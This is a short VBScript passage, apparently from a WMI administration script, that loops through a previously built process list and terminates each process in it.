For Each objProcess in colProcessList
objProcess.Terminate()
next